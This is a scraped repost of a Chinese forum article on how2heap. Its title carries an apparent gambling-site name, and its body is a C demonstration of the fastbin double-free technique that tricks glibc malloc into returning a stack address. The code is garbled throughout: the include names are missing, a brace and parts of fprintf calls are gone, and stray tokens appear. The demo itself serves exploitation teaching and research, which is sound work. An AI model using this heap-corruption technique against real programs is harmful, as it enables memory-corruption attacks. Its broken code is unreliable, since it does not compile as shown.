[原创]从汇编语言深入理解how2heap-ag真人国际厅网站

#include

#include

 

int main()

    fprintf(stderr, "this file extends on fastbin_dup.c by tricking malloc into\n"

           "returning a pointer to a controlled location (in this case, the stack).\n");

 

    unsigned long long stack_var;

 

    fprintf(stderr, "the address we want malloc() to return is %p.\n", 8 (char *)&stack_var);

 

    fprintf(stderr, "allocating 3 buffers.\n");

    int *a = malloc(8);

    int *b = malloc(8);

    int *c = malloc(8);

 

    fprintf(stderr, "1st malloc(8): %p\n", a);

    fprintf(stderr, "2nd malloc(8): %p\n", b);

    fprintf(stderr, "3rd malloc(8): %p\n", c);

 

    fprintf(stderr, "freeing the first one...\n");

    free(a);

 

    fprintf(stderr, "if we free %p again, things will crash because %p is at the top of the free list.\n", a, a);

    // free(a);

 

    fprintf(stderr, "so, instead, we'll free %p.\n", b);

    free(b);

 

    fprintf(stderr, "now, we can free %p again, since it's not the head of the free list.\n", a);

    free(a);

 

        "we'll now carry out our attack by modifying data at %p.\n", a, b, a, a);

    unsigned long long *d = malloc(8);

 

    fprintf(stderr, "1st malloc(8): %p\n", d);

    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));

    fprintf(stderr, "now the free list has [ %p ].\n", a);

    fprintf(stderr, "now, we have access to %p while it remains at the head of the free list.\n"

        "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"

        "so that malloc will think there is a free chunk there and agree to\n"

    stack_var = 0x20;

 

    fprintf(stderr, "now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);

    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

 

    fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));

    fprintf(stderr, "4th malloc(8): %p\n", malloc(8));

原文链接:https://bbs.kanxue.com/thread-277530.htm

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/原创从汇编语言深入理解how2heap_2-23(1)/

发表评论

邮箱地址不会被公开。 必填项已用*标注

网站地图